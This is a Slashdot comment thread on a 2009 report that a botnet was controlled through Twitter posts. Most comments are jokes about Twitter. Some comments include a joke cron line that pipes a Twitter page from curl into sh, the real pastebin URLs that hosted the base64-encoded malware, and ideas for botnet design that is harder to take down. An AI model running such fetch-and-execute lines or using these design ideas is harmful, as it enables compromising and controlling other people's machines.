Beta
×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Twitter Used To Control Botnet Machines

ScuttleMonkey posted more than 5 years ago | from the it's-all-spam-to-me dept.

Security 127

DikSeaCup writes "Arbor Network's Jose Nazario, an expert on botnets, discovered what looks to be the first reported case of hackers using Twitter to control botnets. 'Hackers have long used IRC chat rooms to control botnets, and have continually used clever technologies, such as peer-to-peer strategies, to counter efforts to track, disrupt and sometimes decapitate the bots. Perhaps what's surprising then is that it's taken so long for hackers to take Twitter to the dark side.' The next step, of course, is to code the tweets in such a way that they aren't so suspicious."

cancel ×

127 comments

Sorry! There are no comments related to the filter you selected.

haha (-1, Troll)

Anonymous Coward | more than 5 years ago | (#29070649)

first post

Twitter Bot 2.0 (-1)

Anonymous Coward | more than 5 years ago | (#29070651)

Twitter used to issue press releases about Twitter.

sweet (2, Insightful)

Eleed (97915) | more than 5 years ago | (#29070659)

More reasons to hate Twitter

Re:sweet (1)

masshuu (1260516) | more than 5 years ago | (#29071765)

You need a reason to hate twiter?
Am i the one one here hating it for no reason?

Re:sweet (2, Insightful)

Marxist Hacker 42 (638312) | more than 5 years ago | (#29072503)

Quite possibly. My objection to twitter is the same as all bandwidth-limited Web 2.0 solutions; shorter messages encourage bad grammar and worse content.

And at 120 chars, that makes the bad grammar and worse content *very bad*.

Re:sweet (1)

master5o1 (1068594) | more than 5 years ago | (#29072783)

Twitter is 140 characters.

Re:sweet (1)

Bender Unit 22 (216955) | more than 5 years ago | (#29072929)

its rly nt a prblm & OMG im tired

Re:sweet (1)

jofny (540291) | more than 5 years ago | (#29073189)

I don't get it. What's the problem with grammar evolving to fit different mediums? Grammar evolves every day and always has. There's absolutely nothing that says the grammar we're using at this moment in time is any better at all. In fact, given the amount of data we're generating and the amount of processing we're going to need to do to it (as a society) to make it useful and accessible knowledge, short form communication is beneficial in many circumstances and should be encouraged. As time moves on, the practical etiquette of where it is and is not appropriate to use short form will develop. I love people who make the assumption that because this is how they're doing it now, this is how it should be done ;)

Re:sweet (1)

Cal27 (1610211) | more than 5 years ago | (#29073801)

Your argument for "short form communication" is flawed. It's not beneficial because if you're abbreviating, shortening, or otherwise mutilating a word or phrase, it's not going to be as easily understood by whomever you're saying it to. You can't be absolutely certain that what you think someone is trying to say is what they're actually saying. Always using proper grammar works because the grammar is universal to the language; chatspeak can vary from person to person.

Re:sweet (1)

jofny (540291) | more than 5 years ago | (#29073839)

You're assuming two things:
1. The abbreviation isn't usually recognized
2. Everything needs to abbreviated
3. Misunderstandings stemming from shortness are any more prevalent in short form are any more common than those occurring in other typical informal written communication.

In the first case, there are many many examples of abbreviations being universally understood and evolving into regular lexicon. In the second, there are many things which -can- be concisely and clearly represented, as happens on twitter fairly often. Re number three: I couldn't prove a similarity in here, but I've certainly read a lot of bad, unclear crap on the net and it went on for -pages-.

Sure, but (4, Funny)

operator_error (1363139) | more than 5 years ago | (#29070671)

Sure Twitter is just a large botnet, but is anyone really in control?

U2VjcmV0IGNvZGU= (2, Funny)

Anonymous Coward | more than 5 years ago | (#29071661)

d2hpbGUgKHRydWUpIHsNCiAgICBwaW5nIHR3aXR0ZXIuY29tDQp9

Re:U2VjcmV0IGNvZGU= (1)

mysidia (191772) | more than 5 years ago | (#29073653)

@dee2 h please be Good Until green Kolored Hairy Rhinos yawn down Well Unless princes Interpret Hovels sorted Next Child in A giant Integrated Central Branch walk and Width 5 near Integrated Hold Rope 3 at Xlation Ragged 0 Zith Xwings In up Yonder 29 through Defense Quadrant port 9

Alas, Babylon (-1)

Anonymous Coward | more than 5 years ago | (#29070701)

What!! Network discover! Someone set us up the bomb!

Quickly!! Send out self-destruct signal!!

Later...

@botnet OMFG JESUS HAS RETURNED

Re:Alas, Babylon (4, Insightful)

clone53421 (1310749) | more than 5 years ago | (#29070807)

That's actually an interesting thought... it was sending obfuscated URLs to code that the zombie bots would download and execute.

Wouldn't it make sense, rather than having Twitter simply kill the account, to allow the "good" guys to craft some sort of zombie-self-destruct and tweet its URL over the account? Imagine, all the bots automatically downloading and executing a specially designed tool that removes the malicious trojan...

Re:Alas, Babylon (-1)

Anonymous Coward | more than 5 years ago | (#29070885)

that would be breaking the holy DMCA don't you know? its also the reason they weren't allowed to shut down the other bot nets people have found ways into... god bless american law...

Re:Alas, Babylon (1)

clone53421 (1310749) | more than 5 years ago | (#29070987)

Meh... Twitter can claim complete innocence.

"Well, hey, the password was p@55w0r[), somebody must have hacked the account and did that."

(So what if the password wasn't... who'd know?)

Re:Alas, Babylon (1, Insightful)

Anonymous Coward | more than 5 years ago | (#29071471)

Code signing. Conficker did this, other bot nets probably do too. They simply will not execute a module that hasn't been signed by the correct private key.

Similarly, most botnets do not possess internal "shut down" commands. This is precisely to prevent the good guys from telling the net to stop itself. Even the creator of the net can't stop it (unless they distribute a cryptographically signed update which enables it)

Re:Alas, Babylon (1)

Merls the Sneaky (1031058) | more than 5 years ago | (#29072769)

Conficker does, it detects VM's and will go into sleep mode for about 29000 hours.

Holy shit! (5, Funny)

SatanicPuppy (611928) | more than 5 years ago | (#29070721)

Who knew Twitter had a use?!?!

Re:Holy shit! (0, Redundant)

gollito (980620) | more than 5 years ago | (#29070797)

+1 insightful

Re:Holy shit! (1, Redundant)

AP31R0N (723649) | more than 5 years ago | (#29071415)

Twitter has plenty of uses. The issue has been that it's primary use is reinforcing the ego-centrism of teenagers. Cars and planes were derided as toys when they were invented. Twitter (read: mircoblogging) has tons of potential just waiting for imaginative developers.

Where i work i proposed using it to send alerts to students and faculty. "The DC campus will be closed until tomorrow. Ashburn campus will open at 1030". (guess where i work)

"Students of Macroecon 101, Tuesday class. Your professor was eaten by a grue. Class is canceled until further notice."

Personally, i think twitter should become a feature within other sites, or an open protocol all sites can use.

Re:Holy shit! (4, Insightful)

Korin43 (881732) | more than 5 years ago | (#29071465)

So basically we need email, but with a 150 character limit?

Re:Holy shit! (0, Flamebait)

AP31R0N (723649) | more than 5 years ago | (#29071653)

*groan* Yes, dear. Well done. You're smarter than everyone.

Re:Holy shit! (0)

Anonymous Coward | more than 5 years ago | (#29071965)

So rather than responding to someone's argument you dismiss what they said and patronize them? What you suggested is just a comment box with a 150 character limit.

Re:Holy shit! (3, Informative)

timeOday (582209) | more than 5 years ago | (#29072441)

I think he's right. I asked a twit co-worker what the heck it was for, and he said aggregating all the various sorts of information, email, texts, rss, etc. My question was why did we split them up in the first place? It should all be email. (Especially texts, I'll never accept that one). Now get off my Korean lawn.

Re:Holy shit! (0)

Anonymous Coward | more than 5 years ago | (#29073173)

Oh, I'm sorry... I was unaware that I could email a status update that automatically shows up on my website for all to see. Thank you for showing me the error in my ways, you narrow-minded cunt.

Re:Holy shit! (0)

Anonymous Coward | more than 5 years ago | (#29073833)

Smart, no good. Stupid good.

OOoga ooga. Woowoo. Me stupid stupid. Wawa.

(You get my point?)

Re:Holy shit! (1)

Vexorian (959249) | more than 5 years ago | (#29072809)

Perhaps that's really the thing with it? I guess that when you read a twit/whatever you know it won't take you more than what it takes to read 150 characters, with email, that's different, you could spend ages reading some message...

Re:Holy shit! (1)

rubi (910818) | more than 5 years ago | (#29073001)

Perhaps that's really the thing with it? I guess that when you read a twit/whatever you know it won't take you more than what it takes to read 150 characters, with email, that's different, you could spend ages reading some message...

Especially whith some people that seem to need to write a novel just to tell you "we need you to do this ...."

Re:Holy shit! (1)

Korin43 (881732) | more than 5 years ago | (#29073507)

I guess that's true. Everyone tries so hard to make their emails look fancy instead of just saying "Attention Students: Classes will begin on August 24th." It's got to be an HTML email that looks exactly like their website and has like 30 pictures... But as a person sending emails, switching to Twitter isn't necessary, all you need to do is stop sending such massive emails.

Re:Holy shit! (3, Funny)

michaelhood (667393) | more than 5 years ago | (#29071495)

Twitter (read: mircoblogging) has tons of potential just waiting for imaginative developers.

>

Funny slip that you should call it "mircoblogging" since Twitter is basically logged IRC without channels (hashtags even use #) and a dysfunctional search. Welcome to 15 years ago, kids.

Re:Holy shit! (1)

Marxist Hacker 42 (638312) | more than 5 years ago | (#29072523)

I knew there was a reason I avoided IRC! I prefer my electronic communications to be asynchronous.

Re:Holy shit! (1)

radish (98371) | more than 5 years ago | (#29073517)

As someone who's spent a lot of time on IRC, no - no it isn't. If you want to equate it to IRC it's more like a setup where everyone has their own channel, and you can join many in a single session with the messages all being merged.

Re:Holy shit! (1)

Idiomatick (976696) | more than 5 years ago | (#29071631)

Not at all true. You could use a full featured blog or email or irc to do what you said. And zomg all of those options would be better. If you give me one situation where twitter is better than the 3 options i've listed i'll shit my pants.

Re:Holy shit! (2, Funny)

AP31R0N (723649) | more than 5 years ago | (#29071717)

No can do. i'm entirely too stupid. i am so humbled before your superiority that all i can manage is to tell you how dumbfounded i am at your magnificence. You're clearly smarter than all the people working on using twitter for these applications. You could be the hero who saves the world, why are you keeping this secret to yourself? Save us!

Re:Holy shit! (1)

jofny (540291) | more than 5 years ago | (#29073133)

Twitter forces brevity and conciseness of communication which is often a beneficial attribute...and it's something which neither irc, nor email, or blogging do. RSS, which DOES shorten things, has a lot of fail when it comes to typical data sources (like blogs) which were not written with the intent of being short and so lose fidelity.

Twitter also can be used with built in sms on phones easily and quickly. Email can, too, but you have to select a distro ahead of time...which loses twitter's second communication value...reaching people you might not have thought were interested in the subject at hand through subscriptions. You can do this with irc in general channels, but most phones dont have built in irc clients and so doesn't and will never have the user base of a system that you can use in every SMS capable phone without additional application installs. You'll just never ever have the same kind of usebase in irc without a drastic, radical change in the market.

Finally, the irony of people biatching about how boring or useless twitter is have largely themselves to blame. If you know interesting people, they typically have interesting, useful things to say. If your friends are all doormats, well, theyre going to talk about what they had for breakfast today. And the weather. And etc.

Re:Holy shit! (0)

Anonymous Coward | more than 5 years ago | (#29073203)

Let's see... post a quick status-update to my website from my cellphone that shows up instantly to everyone?

Have fun changing your pants.

Re:Holy shit! (3, Funny)

davester666 (731373) | more than 5 years ago | (#29072131)

Somebody finally found a way to monetize Twitter!

Re:Holy shit! (0)

Anonymous Coward | more than 5 years ago | (#29074169)

C'mon, it's blatantly obvious twitter have haX0red themselves to make it look at though a real haX0r deems twitter worthy of attention..

Inside a botnet, from a botnet insider (-1)

Anonymous Coward | more than 5 years ago | (#29070727)

true story

TwoGirlsOneCup writes "Arbor Network's Jose Nazario, a spic who has something to say about botnets, discovered what looks to be the first reported case of Slashdot editors using gay sex to control subscribers. 'Editors have long used gay bathrooms to control slashdotters, and have continually used clever technologies, such as peer-to-peer reacharounds, to counter efforts to track, disrupt and sometimes prematurely ejaculate on the slashdot illuminati. Perhaps what's surprising then is that it's taken so long for editors to take gay sex to the dark side, and by that, we mean Nigerians.' The next step, of course, is to code the edits in such a way that they aren't so grammaritical."

Reliable (5, Insightful)

Marillion (33728) | more than 5 years ago | (#29070739)

Twitter isn't as reliable as IRC.

Re:Reliable (0)

robinesque (977170) | more than 5 years ago | (#29071275)

I say it's more reliable. Twitter gets cached by all sortsa spiders all day long. If someone blocks twitter, your bot can go to a cache instead.

Re:Reliable (0)

Anonymous Coward | more than 5 years ago | (#29072381)

Really? http://i32.tinypic.com/2aihvno.jpg

Twitter doesn't require an IRC client (1)

coryking (104614) | more than 5 years ago | (#29073127)

IRC requires an IRC client (or some horrible crappy java applet). Last I checked, the only game in town for windows was mIRC.

Re:Twitter doesn't require an IRC client (1)

GiMP (10923) | more than 5 years ago | (#29073537)

IRC is quite an easy protocol. You can access it via telnet if you want to. There are plenty of decent clients for all platforms, although a botnet would just connect directly from its code and wouldn't use a GUI client.

It's not suspicious already (2, Insightful)

Ponga (934481) | more than 5 years ago | (#29070747)

This is about as interesting and informative as everything else being posted to Twitter!!
http://www.wired.com/images_blogs/threatlevel/2009/08/botnet_arbor.jpg [wired.com]
:D

Re:It's not suspicious already (3, Funny)

sootman (158191) | more than 5 years ago | (#29071023)

Hmm... so you're saying I should take out this cron entry...

* * * * * curl twitter.com/evilguy | sh

... that I added per the instructions in some stranger's .sig?

Re:It's not suspicious already (1)

mysidia (191772) | more than 5 years ago | (#29073677)

Yeah, you might want to replace it with something that at least checks for a valid digital signature of some sort, such as a HMAC-MD5 hash.

How are you to know their twitter account hasn't been hacked, or your connection to twitter hijacked?

The HTTP connection to twitter doesn't have the benefit of SSL protection.

Interesting code actually... (4, Informative)

0100010001010011 (652467) | more than 5 years ago | (#29071201)

From the looks of it it's all base64 encoded shortened URLs.

aHR0cDovL2 is http:/// [http]
aHR0cDovL2JpdC5seS is http://bit.ly/ [bit.ly]

The first one is clipped.
The rest go to a pastebinish sites which have gbpm.exe encoded as Base64. It also appears the base64 is different but the exe has the same name (I'm guessing it's changed 'output'?)

http://rifers.org/paste/content/paste/9507/body?key=upd4t3 [rifers.org]
http://rifers.org/paste/content/paste/9508/body?key=upd4t3 [rifers.org]
http://rifers.org/paste/content/paste/9509/body?key=upd4t3 [rifers.org]

They also use Pastebin (http://pastebin.com/pastebin.php?dl=m49f3b4c2) and Debian.net (http://paste.debian.net/44059/download/44059) but both of those file have been deleted.

Re:Interesting code actually... (1)

michaelhood (667393) | more than 5 years ago | (#29071543)

Silly noobs.. they should just use http://stashbox.org/ [stashbox.org] and encrypt the binaries with a private key then base64 encode them.

We're really, really screwed if someone who is determined and knowledgeable decides to make some widespread malware. Think Conficker, with more doom.

Re:Interesting code actually... (1)

BattleApple (956701) | more than 5 years ago | (#29072351)

interesting.. I just tried decoding the data from the first link, and it's a zip file containing gbpm.exe and gbpm.dll

Re:Interesting code actually... (1)

Marxist Hacker 42 (638312) | more than 5 years ago | (#29072533)

WEAK! How hard is it to code a switch statement into your bot based on names of restaurants?

please do go down that rabbit hole ... (2, Interesting)

neonprimetime (528653) | more than 5 years ago | (#29070781)

There's something ironic about this finding, given that Russian hackers allegedly used a botnet to take Twitter down for two days last week. But we won't go down that rabbit hole.

Re:please do go down that rabbit hole ... (0)

Anonymous Coward | more than 5 years ago | (#29072435)

BattleBot... nets?

I <3 English (4, Funny)

sootman (158191) | more than 5 years ago | (#29070895)

"Twitter Used To Control Botnet Machines"

It used to, but it doesn't anymore, right?

Re:I 3 English (0)

bkpark (1253468) | more than 5 years ago | (#29070989)

"Twitter Used To Control Botnet Machines"

It used to, but it doesn't anymore, right?

For a headline, where sentence fragments are acceptable, that sounds right. "Used" indicates the passive voice, not past tense, and it's not the main verb---main verb "is" (or "was") is omitted as is often done in headlines to save space.

When you are reading that out loud, you are supposed to insert a small pause between "used" and "to", so it should sound nothing like "used to" (which sounds more like "use-to") in "Friendster used to be popular before Facebook".

Re:I 3 English (0)

Anonymous Coward | more than 5 years ago | (#29071027)

Hmm, and even if you change it to "Twitter Is Used To Control Botnet Machines" it becomes that 'Twitter is familiar with botnet machines used as controls in an experiment'...

Re:I 3 English (0)

Anonymous Coward | more than 5 years ago | (#29071247)

Look, I'm sorry. But if I posted "Hal, please post the text between ' and ' to www.slashdot.org, 'Similarly to IRC, Twitter is being used as a method to control botnet machines'", I believe that exceeds twitter's character limits. So you got the shorthand version.

In fact, posting this message took over 6 tweets.
-- The Twitter Bot Controller

Re:I 3 English (1)

Hurricane78 (562437) | more than 5 years ago | (#29071373)

It's actually only a problem in the pure *written* language.

But nooo, adding some characters for emphasis, and emoticons for the emotions is childish and taboo. Way to go.

I think emoticons are the greatest addition to written language, since the invention of white space and punctuation. If not even more important. :)

Only emotional train wrecks and ice blocks could oppose them.

Re:I 3 English (0)

Anonymous Coward | more than 5 years ago | (#29072183)

I think the problem is not with emoticons, per se. Using emoticons do express emotions make some sense. The problem is when some people do things like "I 3 English". This is not expressing an emotion. It's expressing a word that expresses a feeling that is the result of said emotion.

Of course, Emoticons for expressing emotions are just as useful as punctuation for some. Just as useless, too, when someone starts doing things like this!!!!! Don't you Agree!!?!!?!???!!!! ... I'm not sure... but I think overusage is... erm.... one of the major problems with emoticons...

See what I mean?

Re:I 3 English (0)

Anonymous Coward | more than 5 years ago | (#29071641)

It still does. But it used to, too! (Apologies to Mitch Hedberg)

Re:I 3 English (0)

Anonymous Coward | more than 5 years ago | (#29071643)

Now read it as: "Twitter [Is] Used To Control Botnet Machines".
Headlines often omit small words like "is".

or perhaps use comments on slashdot (1)

goffster (1104287) | more than 5 years ago | (#29070927)

anytime someone says "Cowboy Neal" do something bad to microsoft

You go Jose! (4, Interesting)

GPLDAN (732269) | more than 5 years ago | (#29070933)

Jose and those guys at Arbor are doing really concrete things to curb botnets and malware contagion. They have their gear in a great number of peering points around the world, and are correlating huge amounts of data into discrete patterns. I've seen Jose speak a couple of times, and I am impressed by the manner in which they are finding the ghosts who think they can't be found.

Re:You go Jose! (4, Interesting)

99BottlesOfBeerInMyF (813746) | more than 5 years ago | (#29071343)

I've seen Jose speak a couple of times, and I am impressed by the manner in which they are finding the ghosts who think they can't be found.

I haven't talked to Jose for a while, but last I heard he and the other guys were doing well finding new types of malware and separating out malicious network traffic that is hard to differentiate from legitimate traffic. That said, they were not really doing things to find the one off attacks perpetrated by people who weren't interested in large scale and automated network attacks. The people I'd call ghosts are the ones who do small scale, specifically targeted attacks to get what they want, then walk away. If you're running a botnet, you aren't being very ghostlike; maybe more vampire like :)

Crowdsourced botnet (2, Interesting)

Kligat (1244968) | more than 5 years ago | (#29070939)

Wouldn't it be weird if someone made a botnet that would follow the directions of anyone that posted on Twitter, with people being able to suggest one command per day that would get upped or down by the masses? Aside from the programmer, who would be held responsible if it were operated like that?

Re:Crowdsourced botnet (0)

Anonymous Coward | more than 5 years ago | (#29071033)

you mean like the slashdot effect?

Re:Crowdsourced botnet (0)

Anonymous Coward | more than 5 years ago | (#29071157)

The programmer would not be held responsible, the website owner would.

Re:Crowdsourced botnet (1)

bertoelcon (1557907) | more than 5 years ago | (#29071285)

We have something similar to that and its called "twitter".

Re:Crowdsourced botnet (3, Funny)

TheRaven64 (641858) | more than 5 years ago | (#29071481)

There's already a botnet like that, but it runs on poorly-secured human brains rather than computers.

Re:Crowdsourced botnet (1)

angelbunny (1501333) | more than 5 years ago | (#29071609)

Sounds like the future of reality TV. *shudders*

Re:Crowdsourced botnet (1)

bugnuts (94678) | more than 5 years ago | (#29072171)

That would just be tyrrany of the masses. Nothing new, when you give every idiot a powerful weapon with little repercussion of using it.

You'd have the French revolution all over again, just over the internet. So every server decapitation would be followed by lmfao and lol, as they tweeted it.

Re:Crowdsourced botnet (0)

Anonymous Coward | more than 5 years ago | (#29072529)

So, basically, 4chan.

Re:Crowdsourced botnet (0)

Anonymous Coward | more than 5 years ago | (#29074205)

This just in..

Microsoft were ddossed by twitterbot for the 137th consecutive day running...

Speculation that a non-microsoft site may soon be targetted and MORE at 23:00

Twitter and many others! (3, Interesting)

hesaigo999ca (786966) | more than 5 years ago | (#29070955)

Anything that can be pinged and return any sort of tcp/ip packets could be a control center if the contents of the packets can actually
be translatable and have been mapped accordingly.

ie- ftp server has certain verbose return that may be configured based on what is being done, so the botnet program calls home to an ftp server...looking like a plain jane communication to any one looking. It tries a few different commands to which the ftp server can reply (with error messages) it can not proceed, however inside the ftp server error message is a text string that contains certain
key phrases.

This scenario is similar to steganography, of hiding in plain sight, inside an image, the contents of data....
I think it's cool to be able to pass off information that is hidden to regular onlookers, but is a lot of coding for nothing if you ask me.

Set up a twitter account where a particular page has the commands for all your bots to follow, and....wait a minute....

Re:Twitter and many others! (0)

Anonymous Coward | more than 5 years ago | (#29071457)

Yeah, this is pretty much it. Any publicly readable and reliable web format that allows regular posting of text is a potential way to control bots. For all we know, somebody could be making YouTube vids of white noise and having their bots visit while reading and parsing commands in random looking UTF-8 hashes dumped into in the video description. Some spam emails may even have text that operates bots. Or maybe it's in the next AnonymousCoward post down the page.

Re:Twitter and many others! (0)

Anonymous Coward | more than 5 years ago | (#29071555)

Slashdot's own X-Futurama field in the HTTP data is a nice example

Stupid idea. (1)

SanityInAnarchy (655584) | more than 5 years ago | (#29071811)

All of these have the same flaw as the IRC-driven botnets -- they're basically relying on a single point of failure. All someone has to do is realize that command/control is going through this one point, and the entire botnet can be shut down. Hardly skynet.

What surprises me is how few botnets (if any) have used truly peer-to-peer systems, like, say, Freenet. Indeed, while Freenet itself may be too high bandwidth and too complex for this, it does have one advantage -- you can't block part of Freenet without blocking all of Freenet.

The trick would be to combine techniques -- phone home to an FTP server, maybe, or to something more plausible -- that's running on just another bot in the swarm. Commands could be sent from any compromised box, and would be signed -- thus, the botnet author could use any Internet cafe, and it'd be difficult to even trace it back to said Internet cafe -- yet the only way to take the swarm down would be to obtain the owner's private key, or deal with each compromised machine individually.

And that could be made difficult with techniques like virtualization, possibly combined with (in especially nasty cases) reflashing the BIOS. Try to tamper with the bot, and the machine self-destructs.

I'm sorry, I hope these ideas are used for good and not evil, but I'm not sure if I'm more disgusted by the existence of botnets, or by the technical incompetence of those who create and operate them.

It's easy to do. (5, Funny)

lymond01 (314120) | more than 5 years ago | (#29070975)

No onE would Think of uSing slashdoT As we aRen'T nearly as oBviOus as someThiNg likE Twitter. // Especially with all our talk about supporting Linux and such.

Re:It's easy to do. (5, Funny)

Pulse_Instance (698417) | more than 5 years ago | (#29071255)

We use linux to read slashdot so your net start does nothing to us.

Re:It's easy to do. (1)

cbiltcliffe (186293) | more than 5 years ago | (#29071755)

You missed the capitalized spaces between the command words.

Besides....how are you going to use the botnet infection to start the botnet infection?

You clearly haven't thought this through.....

Re:It's easy to do. (1)

lymond01 (314120) | more than 5 years ago | (#29072517)

The botnet code, having been installed as a hidden service in Windows since, oh, summer 2001 when I was bored with dissecting live squirrels, parses only capital letters and takes a lowercase n (without a following escape ') as a space.

I'm not saying that all your base, but I might.

tried it, but... (4, Funny)

wibald (725150) | more than 5 years ago | (#29071003)

Sure they tried using Twitter to control their botnet but after sending out one set of instructions they got bored and went back to playing MafiaWars on Facebook.

now (-1, Troll)

Anonymous Coward | more than 5 years ago | (#29071019)

now we know why Sarah Palin is rhyming

Perl (4, Funny)

BJ_Covert_Action (1499847) | more than 5 years ago | (#29071085)

The next step, of course, is to code the tweets in such a way that they aren't so suspicious

And people said that perl obfuscation, poetry, and golf tournaments didn't have any practical application. Ha!

Re:Perl (1)

gladish (982899) | more than 5 years ago | (#29071305)

Or just post your messages as a reply in some forum like slashdot. Most people would probably mod up some random garble as either funny or interesting thinking it was some cryptogram.

Re:Perl (3, Funny)

bugnuts (94678) | more than 5 years ago | (#29071783)

upd4t3 [netfunny.com] posted:

^<@<.@*
}"_# |
-@$&/_%
!( @|=>
;`+$?^?
,#"~|)^G

Re:Perl (0)

Anonymous Coward | more than 5 years ago | (#29072063)

8=======D

Re:Perl (1, Funny)

Anonymous Coward | more than 5 years ago | (#29072823)

*Actual Size.

Twitter only 98% pointless babble (2, Funny)

David Gerard (12369) | more than 5 years ago | (#29071849)

[to be posted [today.com] uh tomorrow, probably]

Only 98% of Twitter updates are "pointless babble," says a new report that studied 2,000 tweets over a period of two weeks.

The top category was "pointless babble" tweets, with nearly 98% of tweets being inanity no sane person could want to read, retweets of inanity, links to inanity, retweets of links to inanity and retweets of retweets of links to links to the reretweet itself. And camera phone pictures of bowel movements on Twitpic.

Almost 2% was Stephen Fry, Neil Gaiman or retweets thereof and the rest was Warren Ellis posting scatological abuse of his fans.

Botnet command messages were becoming more popular, many disguised as combinations of the syllables "lol" "wtf" "d00d" "RT" and "#fb" or scatological abuse of Warren Ellis's fans.

Twitter's demographics as of June 2009 were 55% female, 43% ages 18 to 34, 78% white, and 99.5% of such short attention spans that Facebook might as well be War and Peace. Botnet readership was considered likely to rise as soon, nothing with organic intelligence would be able to cope.

Twitter recently redesigned its homepage, changing the tag "What are you doing now?" to "Post tomorrow's CNN headlines, particularly about #goatse."

qdb (1)

madygoosey (745325) | more than 5 years ago | (#29071859)

Sometimes the qdb.us [qdb.us] quote database site has jibberish in its user moderated queue [qdb.us] which may be control commands. I used to think it was just some idiot auto posting junk to mess with the site, but who knows

Here are some that may be disappearing soon, because they'll be moderated down.
298870 [qdb.us]
298871 [qdb.us]

Re:qdb (1)

MichaelSmith (789609) | more than 5 years ago | (#29071969)

There used to be the OUTGOING thing here as well.

Logo (1)

Simon80 (874052) | more than 5 years ago | (#29071873)

Hmm, where have I seen that logo [andreasn.se] ?

Let's face it, all joking aside (2, Insightful)

Patchw0rk F0g (663145) | more than 5 years ago | (#29071949)

There ain't any technology that one human(s) can come up with that another human(s) can't corrupt.

I don't care how quick, savvy or exotic you are, you're not going to foil everyone forever. I figure it's just a state of grace we have: there's a situation whereby the technology is benign, if asinie; a state whereby it's corrupted, abused and malicious; and a state whereby it's antiquated, unused, and maligned.

I hope Twitter's now made it to that last stage now.

/.: Ultra-Predictable (0, Troll)

Hellhog (1617707) | more than 5 years ago | (#29072291)

Slashdot hates Twitter and ignores the story to trash it, surprise me. Something's popular and not engineered specifically to cater to us; therefore we must hate it. Don't you guys have anything better to do than whine about things you hate - like, say, FIXING things you hate? Shit or get off the pot.

Re:/.: Ultra-Predictable (1)

socsoc (1116769) | more than 5 years ago | (#29072661)

I hate Hell and Hogs. I also know a veterinarian. Can we get you fixed?

Re:/.: Ultra-Predictable (1)

selven (1556643) | more than 5 years ago | (#29073707)

like, say, FIXING things you hate?

We kinda did that with the DDOS recently.

hackers use $CommunicationMedium to control botnet (1)

Vexorian (959249) | more than 5 years ago | (#29072773)

How interesting.
Load More Comments
Slashdot Login

Need an Account?

Forgot your password?

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>